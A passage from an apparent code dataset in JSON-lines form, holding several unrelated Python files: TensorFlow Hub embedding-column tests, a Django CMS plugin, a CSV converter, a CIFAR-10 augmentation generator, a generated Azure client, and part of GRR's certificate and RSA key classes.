tf_v1.train.MonitoredSession() as sess:\n self.assertAllEqual(sess.run(input_layer), [[1, 2, 3, 4], [5, 5, 5, 5]])\n for _ in range(10):\n sess.run(train_op)\n self.assertAllClose(sess.run(input_layer), target, atol=0.5)\n\n def testInvalidTextModule(self):\n spec = hub.create_module_spec(invalid_text_module_fn)\n with self.assertRaisesRegexp(ValueError, \"only one input\"):\n hub.text_embedding_column(\"coment\", spec, trainable=False)\n\n\ndef create_image_module_fn(randomly_initialized=False):\n def image_module_fn():\n \"\"\"Maps 1x2 images to sums of each color channel.\"\"\"\n images = tf_v1.placeholder(dtype=tf.float32, shape=[None, 1, 2, 3])\n if randomly_initialized:\n initializer = tf_v1.random_uniform_initializer(\n minval=-1, maxval=1, dtype=tf.float32)\n else:\n initializer = tf_v1.constant_initializer(1.0, dtype=tf.float32)\n weight = tf_v1.get_variable(\n name=\"weight\", shape=[1], initializer=initializer)\n sum_channels = tf.reduce_sum(images, axis=[1, 2]) * weight\n hub.add_signature(inputs={\"images\": images}, outputs=sum_channels)\n return image_module_fn\n\n\nclass ImageEmbeddingColumnTest(tf.test.TestCase):\n\n def setUp(self):\n self.spec = hub.create_module_spec(create_image_module_fn())\n self.randomly_initialized_spec = hub.create_module_spec(\n create_image_module_fn(randomly_initialized=True))\n\n def 
testExpectedImageSize(self):\n image_column = hub.image_embedding_column(\"image\", self.spec)\n # The usage comment recommends this code pattern, so we test it here.\n self.assertSequenceEqual(\n hub.get_expected_image_size(image_column.module_spec), [1, 2])\n\n def testVariableShape(self):\n image_column = hub.image_embedding_column(\"image\", self.spec)\n self.assertEqual(image_column.variable_shape, [3])\n\n def testParents(self):\n image_column = hub.image_embedding_column(\"image\", self.spec)\n self.assertEqual([\"image\"], image_column.parents)\n\n def testMakeParseExampleSpec(self):\n image_column = hub.image_embedding_column(\"image\", self.spec)\n parsing_spec = tf_v1.feature_column.make_parse_example_spec([image_column])\n self.assertEqual(\n parsing_spec,\n {\"image\": tf_v1.FixedLenFeature([1, 2, 3], dtype=tf.float32)})\n\n def testInputLayer(self):\n features = {\n \"image_a\": [[[[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]]],\n [[[0.7, 0.7, 0.7], [0.1, 0.2, 0.3]]]],\n \"image_b\": [[[[0.1, 0.2, 0.1], [0.2, 0.1, 0.2]]],\n [[[0.1, 0.2, 0.3], [0.3, 0.2, 0.1]]]],\n }\n feature_columns = [\n hub.image_embedding_column(\"image_a\", self.spec),\n hub.image_embedding_column(\"image_b\", self.spec),\n ]\n with tf.Graph().as_default():\n input_layer = tf_v1.feature_column.input_layer(features, feature_columns)\n with tf_v1.train.MonitoredSession() as sess:\n output = sess.run(input_layer)\n self.assertAllClose(\n output,\n [[0.5, 0.7, 0.9, 0.3, 0.3, 0.3], [0.8, 0.9, 1.0, 0.4, 0.4, 0.4]])\n\n def testDenseFeatures(self):\n features = {\n \"image_a\": [[[[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]]],\n [[[0.7, 0.7, 0.7], [0.1, 0.2, 0.3]]]],\n \"image_b\": [[[[0.1, 0.2, 0.1], [0.2, 0.1, 0.2]]],\n [[[0.1, 0.2, 0.3], [0.3, 0.2, 0.1]]]],\n }\n feature_columns = [\n hub.image_embedding_column(\"image_a\", self.spec),\n hub.image_embedding_column(\"image_b\", self.spec),\n ]\n if not feature_column_v2.is_feature_column_v2(feature_columns):\n self.skipTest(\"Resources not implemented in the state manager of feature \"\n \"column v2.\")\n with tf.Graph().as_default():\n feature_layer = _dense_features_module.DenseFeatures(feature_columns)\n feature_layer_out = feature_layer(features)\n with tf_v1.train.MonitoredSession() as sess:\n output = sess.run(feature_layer_out)\n self.assertAllClose(\n output,\n [[0.5, 0.7, 0.9, 0.3, 0.3, 0.3], [0.8, 0.9, 1.0, 0.4, 0.4, 0.4]])\n\n def testDenseFeatures_shareAcrossApplication(self):\n features = {\n \"image\": [[[[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]]],\n [[[0.7, 0.7, 0.7], [0.1, 0.2, 0.3]]]],\n }\n feature_columns = [\n hub.image_embedding_column(\"image\", self.randomly_initialized_spec),\n ]\n if not feature_column_v2.is_feature_column_v2(feature_columns):\n self.skipTest(\"Resources not implemented in the state manager of feature \"\n \"column v2.\")\n with tf.Graph().as_default():\n feature_layer = _dense_features_module.DenseFeatures(feature_columns)\n feature_layer_out_1 = feature_layer(features)\n feature_layer_out_2 = feature_layer(features)\n\n with tf_v1.train.MonitoredSession() as sess:\n output_1 = sess.run(feature_layer_out_1)\n output_2 = sess.run(feature_layer_out_2)\n\n self.assertAllClose(output_1, output_2)\n\n def testWorksWithCannedEstimator(self):\n image_column = hub.image_embedding_column(\"image\", self.spec)\n other_column = tf_v1.feature_column.numeric_column(\"number\")\n\n feature_columns = [image_column, other_column]\n estimator = tf_v1.estimator.DNNClassifier(\n hidden_units=[10],\n feature_columns=feature_columns,\n 
model_dir=self.get_temp_dir())\n\n # This only tests that estimator apis are working with the feature\n # column without throwing exceptions.\n features = {\n \"image\":\n np.array([[[[0.1, 0.2, 0.3], [0.4, 0.5, 0.6]]],\n [[[0.7, 0.7, 0.7], [0.1, 0.2, 0.3]]]],\n dtype=np.float32),\n \"number\":\n np.array([[20], [1]]),\n }\n labels = np.array([[1], [0]])\n if hasattr(tf.compat, \"v1\"):\n numpy_input_fn = tf.compat.v1.estimator.inputs.numpy_input_fn\n else:\n numpy_input_fn = tf_v1.estimator.inputs.numpy_input_fn\n input_fn = numpy_input_fn(features, labels, shuffle=True)\n estimator.train(input_fn, max_steps=1)\n estimator.evaluate(input_fn, steps=1)\n estimator.predict(input_fn)\n\n\nclass SparseTextEmbeddingColumnTest(tf.test.TestCase):\n\n def setUp(self):\n self.spec = hub.create_module_spec(text_module_fn)\n\n def testVariableShape(self):\n text_column = hub.sparse_text_embedding_column(\n \"text\", self.spec, combiner=\"mean\", default_value=None, trainable=False)\n self.assertEqual(text_column._variable_shape, [4])\n\n def testMakeParseExampleSpec(self):\n text_column = hub.sparse_text_embedding_column(\n \"text\", self.spec, combiner=\"mean\", default_value=None, trainable=False)\n parsing_spec = tf_v1.feature_column.make_parse_example_spec([text_column])\n self.assertEqual(parsing_spec, {\"text\": tf_v1.VarLenFeature(tf.string)})\n\n def testParents(self):\n text_column = hub.sparse_text_embedding_column(\n \"text\", self.spec, \"sum\", \"\", trainable=False)\n self.assertEqual([\"text\"], text_column.parents)\n\n def testInputLayer(self):\n with tf.Graph().as_default():\n text_a = tf.SparseTensor(\n values=[\"hello world\", \"pair-programming\", \"hello world\"],\n indices=[[0, 0], [0, 1], [1, 0]],\n dense_shape=[2, 2])\n text_b = tf.SparseTensor(\n values=[\"hello world\", \"oov token\"],\n indices=[[0, 0], [0, 1]],\n dense_shape=[2, 3])\n\n features = {\n \"text_a\": text_a,\n \"text_b\": text_b,\n }\n feature_columns = [\n hub.sparse_text_embedding_column(\n \"text_a\",\n self.spec,\n combiner=\"mean\",\n default_value=\"__UNKNOWN__\",\n trainable=False),\n hub.sparse_text_embedding_column(\n \"text_b\",\n self.spec,\n combiner=\"mean\",\n default_value=\"__UNKNOWN__\",\n trainable=False),\n ]\n input_layer = tf_v1.feature_column.input_layer(features, feature_columns)\n with tf_v1.train.MonitoredSession() as sess:\n output = sess.run(input_layer)\n self.assertAllEqual(\n output,\n [[3, 3.5, 4, 4.5, 0.5, 1, 1.5, 2], [1, 2, 3, 4, 0, 0, 0, 0]])\n # ([1, 2, 3, 4] + [5, 5, 5, 5])/2 extend ([1, 2, 3, 4] + [0, 0, 0, 0])/2\n # [1, 2, 3, 4] extend [0, 0, 0, 0]\n\n def testTrainableEmbeddingColumn(self):\n feature_columns = [\n hub.sparse_text_embedding_column(\n \"text\",\n self.spec,\n combiner=\"mean\",\n default_value=None,\n trainable=True),\n ]\n\n with tf.Graph().as_default():\n text = tf.SparseTensor(\n values=[\"hello world\", \"pair-programming\"],\n indices=[[0, 0], [1, 0]],\n dense_shape=[2, 2])\n\n target = [[1, 1, 1, 1], [4, 3, 2, 1]]\n input_layer = tf_v1.feature_column.input_layer({\"text\": text},\n feature_columns)\n\n loss = tf_v1.losses.mean_squared_error(input_layer, target)\n optimizer = tf_v1.train.GradientDescentOptimizer(learning_rate=0.97)\n train_op = optimizer.minimize(loss)\n\n with tf_v1.train.MonitoredSession() as sess:\n self.assertAllEqual(sess.run(input_layer), [[1, 2, 3, 4], [5, 5, 5, 5]])\n for _ in range(10):\n sess.run(train_op)\n self.assertAllClose(sess.run(input_layer), target, atol=0.5)\n\n def testEmptySparseTensorBatch(self):\n 
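# A sparse batch with no entries should map every row to the all-zero embedding.\n    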
feature_columns = [\n hub.sparse_text_embedding_column(\n \"text\",\n self.spec,\n combiner=\"mean\",\n default_value=\"default\",\n trainable=True),\n ]\n\n with tf.Graph().as_default():\n text = tf.SparseTensor(\n values=tf_v1.constant([], dtype=tf_v1.string, shape=[0]),\n indices=tf_v1.constant([], dtype=tf_v1.int64, shape=[0, 2]),\n dense_shape=[3, 0])\n\n input_layer = tf_v1.feature_column.input_layer({\"text\": text},\n feature_columns)\n\n with tf_v1.train.MonitoredSession() as sess:\n embeddings = sess.run(input_layer)\n self.assertAllEqual(embeddings,\n [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]])\n\n def testEmptySparseTensorRow(self):\n feature_columns = [\n hub.sparse_text_embedding_column(\n \"text\",\n self.spec,\n combiner=\"mean\",\n default_value=\"default\",\n trainable=True),\n ]\n\n with tf.Graph().as_default():\n text = tf.SparseTensor(\n values=tf_v1.constant([\"hello world\"], dtype=tf_v1.string, shape=[1]),\n indices=tf_v1.constant([[0, 0]], dtype=tf_v1.int64, shape=[1, 2]),\n dense_shape=[2, 1])\n\n input_layer = tf_v1.feature_column.input_layer({\"text\": text},\n feature_columns)\n\n with tf_v1.train.MonitoredSession() as sess:\n embeddings = sess.run(input_layer)\n self.assertAllEqual(embeddings, [[1, 2, 3, 4], [0, 0, 0, 0]])\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n"} {"ext": "py", "sha": "1a2fcd9d775da7ad6e0fbffbd09813c027c38413", "content": "# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom django.template import TemplateDoesNotExist\nfrom django.template.loader import select_template\nfrom cms.plugin_base import CMSPluginBase\nfrom cms.plugin_pool import plugin_pool\n\nfrom js_services import models, forms\nfrom .constants import (\n IS_THERE_COMPANIES,\n)\nif IS_THERE_COMPANIES:\n from js_companies.models import Company\n\n\n@plugin_pool.register_plugin\nclass RelatedServicesPlugin(CMSPluginBase):\n TEMPLATE_NAME = 'js_services/plugins/related_services__%s.html'\n module = 'Services'\n render_template = 'js_services/plugins/related_services.html'\n name = _('Related Services')\n model = models.RelatedServicesPlugin\n form = forms.RelatedServicesPluginForm\n\n def render(self, context, instance, placeholder):\n request = context.get('request')\n context['instance'] = instance\n context['title'] = instance.title\n context['icon'] = instance.icon\n context['image'] = instance.image\n context['background_color'] = instance.background_color\n context['full_screen'] = instance.full_screen\n\n qs = instance.related_services.published()\n related_sections = instance.related_sections.all()\n related_people = instance.related_people.all()\n if IS_THERE_COMPANIES:\n related_companies = instance.related_companies.all()\n related_categories = instance.related_categories.all()\n\n if not qs.exists():\n selected = False\n qs = models.Service.objects.published().distinct()\n if related_sections.exists():\n selected = True\n qs = qs.filter(sections__in=related_sections)\n if related_people.exists():\n selected = True\n qs = qs.filter(person__in=related_people)\n if IS_THERE_COMPANIES and related_companies.exists():\n selected = True\n qs = qs.filter(companies__in=related_companies)\n if related_categories.exists():\n selected = True\n qs = qs.filter(categories__in=related_categories)\n if not selected:\n qs = models.Service.objects.none()\n context['related_services_all'] = qs\n context['related_services'] = qs[:int(instance.count)]\n\n return context\n\n def 
get_render_template(self, context, instance, placeholder):\n if instance.layout:\n template = self.TEMPLATE_NAME % instance.layout\n try:\n select_template([template])\n return template\n except TemplateDoesNotExist:\n pass\n return self.render_template\n\n def save_model(self, request, obj, form, change):\n super().save_model(request, obj, form, change)\n if IS_THERE_COMPANIES:\n obj.related_companies.set(Company.objects.filter(pk__in=form.cleaned_data.get('related_companies')))\n"} {"ext": "py", "sha": "1a2fcdd43365079c42475bbfe897908520e51365", "content": "# -*- encoding: utf-8 -*-\n\ndef log(*args, **kwargs):\n print(args, kwargs)"} {"ext": "py", "sha": "1a2fcde7cf410f5cc6185fb6821140640453ed7a", "content": "import sys\nimport yaml\nimport os\n\ndef getcsv(argv):\n\tif len(argv) == 0:\n\t\tprint(\"No input files given.\")\n\telse:\n\t\tflag = True\n\t\tout_string = ''\n\t\tkeys = ['L1c', 'L1b', 'L1a', 'L2c', 'L2b', 'L2a', 'L2prf',\n\t\t\t\t'TLBe', 'TLBp', 'TLBa', 'IPC',\n\t\t\t\t'Total_Instructions', 'Total_Cycles',\n\t\t\t\t'L1-Total-Misses', 'L1-Load-Misses', 'L1-Store-Misses',\n\t\t\t\t'L2-Total-Misses', 'L2-Load-Misses', 'L2-Store-Misses',\n\t\t\t\t'Tlb-Total-Misses', 'Tlb-Load-Misses', 'Tlb-Store-Misses']\n\t\theader = ''\n\t\tfor key in keys:\n\t\t\theader += key\n\t\t\theader += ';'\n\t\tout_string = out_string + header + '\\n'\n\t\tfor i in range(0, len(argv)):\n\t\t\tif os.path.exists(argv[i]):\n\t\t\t\twith open(argv[i], 'r') as in_file:\n\t\t\t\t\tl_key = ''\n\t\t\t\t\ttry:\n\t\t\t\t\t\tin_stream = yaml.safe_load(in_file)\n\t\t\t\t\t\tline = ''\n\t\t\t\t\t\tfor key in keys:\n\t\t\t\t\t\t\tl_key = key\n\t\t\t\t\t\t\tline += str(in_stream[key])\n\t\t\t\t\t\t\tline += ';'\n\t\t\t\t\t\tout_string = out_string + line + '\\n'\n\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\tsys.stderr.write(\"--Error-- {} does not contain key: {}.\\n\".format(argv[i], l_key))\n\t\t\t\t\t\tflag = False\n\t\t\telse:\n\t\t\t\tsys.stderr.write(\"File {} does not exist.\".format(argv[i]))\n\t\tif flag:\n\t\t\tprint('Process finished without errors.')\n\t\t\treturn out_string\n\t\telse:\n\t\t\tsys.stderr.write('Process finished with errors.' 
+ '\\n')\n\t\t\treturn False\n"} {"ext": "py", "sha": "1a2fce9e7dc4970a5b9f7925ba30476dbc1fe827", "content": "import random\nimport numpy as np\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nfrom .auto_augment import cutout, apply_policy\nfrom .utils import *\n\n\nclass Cifar10ImageDataGenerator:\n def __init__(self, args):\n self.datagen = ImageDataGenerator(width_shift_range=0.1, height_shift_range=0.1, fill_mode='constant', cval=0, horizontal_flip=True)\n\n self.means = np.array([0.4914009 , 0.48215896, 0.4465308])\n self.stds = np.array([0.24703279, 0.24348423, 0.26158753])\n\n self.args = args\n if args.auto_augment:\n self.policies = [\n ['Invert', 0.1, 7, 'Contrast', 0.2, 6],\n ['Rotate', 0.7, 2, 'TranslateX', 0.3, 9],\n ['Sharpness', 0.8, 1, 'Sharpness', 0.9, 3],\n ['ShearY', 0.5, 8, 'TranslateY', 0.7, 9],\n ['AutoContrast', 0.5, 8, 'Equalize', 0.9, 2],\n ['ShearY', 0.2, 7, 'Posterize', 0.3, 7],\n ['Color', 0.4, 3, 'Brightness', 0.6, 7],\n ['Sharpness', 0.3, 9, 'Brightness', 0.7, 9],\n ['Equalize', 0.6, 5, 'Equalize', 0.5, 1],\n ['Contrast', 0.6, 7, 'Sharpness', 0.6, 5],\n ['Color', 0.7, 7, 'TranslateX', 0.5, 8],\n ['Equalize', 0.3, 7, 'AutoContrast', 0.4, 8],\n ['TranslateY', 0.4, 3, 'Sharpness', 0.2, 6],\n ['Brightness', 0.9, 6, 'Color', 0.2, 8],\n ['Solarize', 0.5, 2, 'Invert', 0, 0.3],\n ['Equalize', 0.2, 0, 'AutoContrast', 0.6, 0],\n ['Equalize', 0.2, 8, 'Equalize', 0.6, 4],\n ['Color', 0.9, 9, 'Equalize', 0.6, 6],\n ['AutoContrast', 0.8, 4, 'Solarize', 0.2, 8],\n ['Brightness', 0.1, 3, 'Color', 0.7, 0],\n ['Solarize', 0.4, 5, 'AutoContrast', 0.9, 3],\n ['TranslateY', 0.9, 9, 'TranslateY', 0.7, 9],\n ['AutoContrast', 0.9, 2, 'Solarize', 0.8, 3],\n ['Equalize', 0.8, 8, 'Invert', 0.1, 3],\n ['TranslateY', 0.7, 9, 'AutoContrast', 0.9, 1],\n ]\n\n def standardize(self, x):\n x = x.astype('float32') / 255\n\n means = self.means.reshape(1, 1, 1, 3)\n stds = self.stds.reshape(1, 1, 1, 3)\n\n x -= means\n x /= (stds + 1e-6)\n\n return x\n\n def flow(self, x, y=None, batch_size=32, shuffle=True, sample_weight=None,\n seed=None, save_to_dir=None, save_prefix='', save_format='png', subset=None):\n batches = self.datagen.flow(x, y, batch_size, shuffle, sample_weight,\n seed, save_to_dir, save_prefix, save_format, subset)\n\n while True:\n x_batch, y_batch = next(batches)\n\n if self.args.cutout:\n for i in range(x_batch.shape[0]):\n x_batch[i] = cutout(x_batch[i])\n\n if self.args.auto_augment:\n x_batch = x_batch.astype('uint8')\n for i in range(x_batch.shape[0]):\n x_batch[i] = apply_policy(x_batch[i], self.policies[random.randrange(len(self.policies))])\n\n x_batch = self.standardize(x_batch)\n\n yield x_batch, y_batch\n\n\ndef main():\n import argparse\n import matplotlib.pyplot as plt\n from tensorflow.keras.datasets import cifar10\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--cutout', default=True, type=str2bool)\n parser.add_argument('--auto-augment', default=True, type=str2bool)\n args = parser.parse_args()\n\n datagen = Cifar10ImageDataGenerator(args)\n\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\n for imgs, _ in datagen.flow(x_train, y_train):\n plt.imshow(imgs[0].astype('uint8'))\n plt.axis('off')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a2fcead660347520d44efaf9167beda4251c435", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for license information.\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------\nfrom typing import TYPE_CHECKING\nimport warnings\n\nfrom azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error\nfrom azure.core.pipeline import PipelineResponse\nfrom azure.core.pipeline.transport import HttpRequest, HttpResponse\nfrom azure.mgmt.core.exceptions import ARMErrorFormat\n\nfrom .. import models\n\nif TYPE_CHECKING:\n # pylint: disable=unused-import,ungrouped-imports\n from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar\n\n T = TypeVar('T')\n ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]\n\nclass UsersTodoListsOperations(object):\n \"\"\"UsersTodoListsOperations operations.\n\n You should not instantiate this class directly. Instead, you should create a Client instance that\n instantiates it for you and attaches it as an attribute.\n\n :ivar models: Alias to model classes used in this operation group.\n :type models: ~users_functions.models\n :param client: Client for service requests.\n :param config: Configuration of service client.\n :param serializer: An object model serializer.\n :param deserializer: An object model deserializer.\n \"\"\"\n\n models = models\n\n def __init__(self, client, config, serializer, deserializer):\n self._client = client\n self._serialize = serializer\n self._deserialize = deserializer\n self._config = config\n\n def delta(\n self,\n user_id, # type: str\n **kwargs # type: Any\n ):\n # type: (...) 
-> List[\"models.MicrosoftGraphTodoTaskList\"]\n \"\"\"Invoke function delta.\n\n Invoke function delta.\n\n :param user_id: key: id of user.\n :type user_id: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: list of MicrosoftGraphTodoTaskList, or the result of cls(response)\n :rtype: list[~users_functions.models.MicrosoftGraphTodoTaskList]\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[List[\"models.MicrosoftGraphTodoTaskList\"]]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n accept = \"application/json\"\n\n # Construct URL\n url = self.delta.metadata['url'] # type: ignore\n path_format_arguments = {\n 'user-id': self._serialize.url(\"user_id\", user_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n request = self._client.get(url, query_parameters, header_parameters)\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize(models.OdataError, response)\n raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)\n\n deserialized = self._deserialize('[MicrosoftGraphTodoTaskList]', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n delta.metadata = {'url': '/users/{user-id}/todo/lists/microsoft.graph.delta()'} # type: ignore\n"} {"ext": "py", "sha": "1a2fd193df9535e53e3f04f4eb03da31d7714631", "content": "#!/usr/bin/env python\n\"\"\"Implementation of various cryptographic types.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nfrom __future__ import unicode_literals\n\nimport binascii\nimport hashlib\nimport logging\nimport os\n\n\nfrom cryptography import exceptions\nfrom cryptography import x509\nfrom cryptography.hazmat.backends import openssl\nfrom cryptography.hazmat.primitives import ciphers\nfrom cryptography.hazmat.primitives import constant_time\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives import hmac\nfrom cryptography.hazmat.primitives import padding as sym_padding\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives.ciphers import algorithms\nfrom cryptography.hazmat.primitives.ciphers import modes\nfrom cryptography.hazmat.primitives.kdf import pbkdf2\nfrom cryptography.x509 import oid\n\nfrom future.builtins import str\nfrom future.utils import string_types\nfrom typing import Text\n\nfrom grr_response_core.lib import config_lib\nfrom grr_response_core.lib import rdfvalue\nfrom grr_response_core.lib import type_info\nfrom grr_response_core.lib import utils\nfrom grr_response_core.lib.rdfvalues import standard as rdf_standard\nfrom grr_response_core.lib.rdfvalues import structs as rdf_structs\nfrom grr_response_core.lib.util import precondition\nfrom 
grr_response_core.lib.util import random\nfrom grr_response_proto import jobs_pb2\n\n\nclass Error(Exception):\n pass\n\n\nclass VerificationError(Error):\n pass\n\n\nclass InvalidSignature(Error):\n pass\n\n\nclass CipherError(rdfvalue.DecodeError):\n \"\"\"Raised when decryption failed.\"\"\"\n\n\nclass Certificate(rdf_structs.RDFProtoStruct):\n protobuf = jobs_pb2.Certificate\n\n\nclass RDFX509Cert(rdfvalue.RDFPrimitive):\n \"\"\"X509 certificates used to communicate with this client.\"\"\"\n\n def __init__(self, initializer=None, age=None):\n super(RDFX509Cert, self).__init__(initializer=initializer, age=age)\n if self._value is None and initializer is not None:\n if isinstance(initializer, x509.Certificate):\n self._value = initializer\n elif isinstance(initializer, bytes):\n self.ParseFromString(initializer)\n else:\n raise rdfvalue.InitializeError(\n \"Cannot initialize %s from %s.\" % (self.__class__, initializer))\n\n def GetRawCertificate(self):\n return self._value\n\n def GetCN(self):\n subject = self._value.subject\n try:\n cn_attributes = subject.get_attributes_for_oid(oid.NameOID.COMMON_NAME)\n if len(cn_attributes) > 1:\n raise rdfvalue.DecodeError(\"Cert has more than 1 CN entries.\")\n cn_attribute = cn_attributes[0]\n except IndexError:\n raise rdfvalue.DecodeError(\"Cert has no CN\")\n\n return cn_attribute.value\n\n def GetPublicKey(self):\n return RSAPublicKey(self._value.public_key())\n\n def GetSerialNumber(self):\n return self._value.serial_number\n\n def GetIssuer(self):\n return self._value.issuer\n\n def ParseFromString(self, string):\n try:\n self._value = x509.load_pem_x509_certificate(\n string, backend=openssl.backend)\n except (ValueError, TypeError) as e:\n raise rdfvalue.DecodeError(\"Invalid certificate %s: %s\" % (string, e))\n # This can also raise if there isn't exactly one CN entry.\n self.GetCN()\n\n def ParseFromHumanReadable(self, string):\n precondition.AssertType(string, Text)\n self.ParseFromString(string.encode(\"ascii\"))\n\n def ParseFromDatastore(self, value):\n precondition.AssertType(value, bytes)\n self.ParseFromString(value)\n\n def SerializeToString(self):\n if self._value is None:\n return \"\"\n return self._value.public_bytes(encoding=serialization.Encoding.PEM)\n\n def AsPEM(self):\n return self.SerializeToString()\n\n def __str__(self):\n return self.SerializeToString()\n\n def Verify(self, public_key):\n \"\"\"Verifies the certificate using the given key.\n\n Args:\n public_key: The public key to use.\n\n Returns:\n True: Everything went well.\n\n Raises:\n VerificationError: The certificate did not verify.\n \"\"\"\n # TODO(amoser): We have to do this manually for now since cryptography does\n # not yet support cert verification. 
There is PR 2460:\n # https://github.com/pyca/cryptography/pull/2460/files\n # that will add it, once it's in we should switch to using this.\n\n # Note that all times here are in UTC.\n now = rdfvalue.RDFDatetime.Now().AsDatetime()\n if now > self._value.not_valid_after:\n raise VerificationError(\"Certificate expired!\")\n if now < self._value.not_valid_before:\n raise VerificationError(\"Certificate not yet valid!\")\n\n public_key.Verify(\n self._value.tbs_certificate_bytes,\n self._value.signature,\n hash_algorithm=self._value.signature_hash_algorithm)\n return True\n\n @classmethod\n def ClientCertFromCSR(cls, csr):\n \"\"\"Creates a new cert for the given common name.\n\n Args:\n csr: A CertificateSigningRequest.\n Returns:\n The signed cert.\n \"\"\"\n builder = x509.CertificateBuilder()\n # Use the client CN for a cert serial_id. This will ensure we do\n # not have clashing cert id.\n common_name = csr.GetCN()\n serial = int(common_name.split(\".\")[1], 16)\n builder = builder.serial_number(serial)\n builder = builder.subject_name(\n x509.Name(\n [x509.NameAttribute(oid.NameOID.COMMON_NAME, str(common_name))]))\n\n now = rdfvalue.RDFDatetime.Now()\n now_plus_year = now + rdfvalue.Duration(\"52w\")\n builder = builder.not_valid_after(now_plus_year.AsDatetime())\n now_minus_ten = now - rdfvalue.Duration(\"10s\")\n builder = builder.not_valid_before(now_minus_ten.AsDatetime())\n # TODO(user): dependency loop with\n # grr/core/grr_response_core/config/client.py.\n # pylint: disable=protected-access\n ca_cert = config_lib._CONFIG[\"CA.certificate\"]\n # pylint: enable=protected-access\n builder = builder.issuer_name(ca_cert.GetIssuer())\n builder = builder.public_key(csr.GetPublicKey().GetRawPublicKey())\n\n # TODO(user): dependency loop with\n # grr/core/grr_response_core/config/client.py.\n # pylint: disable=protected-access\n ca_key = config_lib._CONFIG[\"PrivateKeys.ca_key\"]\n # pylint: enable=protected-access\n\n return RDFX509Cert(\n builder.sign(\n private_key=ca_key.GetRawPrivateKey(),\n algorithm=hashes.SHA256(),\n backend=openssl.backend))\n\n\nclass CertificateSigningRequest(rdfvalue.RDFValue):\n \"\"\"A CSR Rdfvalue.\"\"\"\n\n def __init__(self,\n initializer=None,\n common_name=None,\n private_key=None,\n age=None):\n super(CertificateSigningRequest, self).__init__(\n initializer=initializer, age=age)\n if self._value is None:\n if isinstance(initializer, x509.CertificateSigningRequest):\n self._value = initializer\n elif isinstance(initializer, string_types):\n self.ParseFromString(initializer)\n elif common_name and private_key:\n self._value = x509.CertificateSigningRequestBuilder().subject_name(\n x509.Name(\n [x509.NameAttribute(oid.NameOID.COMMON_NAME,\n str(common_name))])).sign(\n private_key.GetRawPrivateKey(),\n hashes.SHA256(),\n backend=openssl.backend)\n elif initializer is not None:\n raise rdfvalue.InitializeError(\n \"Cannot initialize %s from %s.\" % (self.__class__, initializer))\n\n def ParseFromString(self, csr_as_pem):\n self._value = x509.load_pem_x509_csr(csr_as_pem, backend=openssl.backend)\n\n def ParseFromDatastore(self, value):\n precondition.AssertType(value, bytes)\n self.ParseFromString(value)\n\n def SerializeToString(self):\n if self._value is None:\n return \"\"\n return self._value.public_bytes(serialization.Encoding.PEM)\n\n def AsPEM(self):\n return self.SerializeToString()\n\n def __str__(self):\n return self.SerializeToString()\n\n def GetCN(self):\n subject = self._value.subject\n try:\n cn_attributes = 
subject.get_attributes_for_oid(oid.NameOID.COMMON_NAME)\n if len(cn_attributes) > 1:\n raise rdfvalue.DecodeError(\"CSR has more than 1 CN entries.\")\n cn_attribute = cn_attributes[0]\n except IndexError:\n raise rdfvalue.DecodeError(\"CSR has no CN\")\n\n return cn_attribute.value\n\n def GetPublicKey(self):\n return RSAPublicKey(self._value.public_key())\n\n def Verify(self, public_key):\n public_key.Verify(\n self._value.tbs_certrequest_bytes,\n self._value.signature,\n hash_algorithm=self._value.signature_hash_algorithm)\n return True\n\n\nclass RSAPublicKey(rdfvalue.RDFPrimitive):\n \"\"\"An RSA public key.\"\"\"\n\n def __init__(self, initializer=None, age=None):\n super(RSAPublicKey, self).__init__(initializer=initializer, age=age)\n if self._value is None and initializer is not None:\n if isinstance(initializer, rsa.RSAPublicKey):\n self._value = initializer\n elif isinstance(initializer, bytes):\n self.ParseFromString(initializer)\n elif isinstance(initializer, Text):\n self.ParseFromString(initializer.encode(\"ascii\"))\n else:\n raise rdfvalue.InitializeError(\n \"Cannot initialize %s from %s.\" % (self.__class__, initializer))\n\n def GetRawPublicKey(self):\n return self._value\n\n def ParseFromString(self, pem_string):\n precondition.AssertType(pem_string, bytes)\n try:\n self._value = serialization.load_pem_public_key(\n pem_string, backend=openssl.backend)\n except (TypeError, ValueError, 